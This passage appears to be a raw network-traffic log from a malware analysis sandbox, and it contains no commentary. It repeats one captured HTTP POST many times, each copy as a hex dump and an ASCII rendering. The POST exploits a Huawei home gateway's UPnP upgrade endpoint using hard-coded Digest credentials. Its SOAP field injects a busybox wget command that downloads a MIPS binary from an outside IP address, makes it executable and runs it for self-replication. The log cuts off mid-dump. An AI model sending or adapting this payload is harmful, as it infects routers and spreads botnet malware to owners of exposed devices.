6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 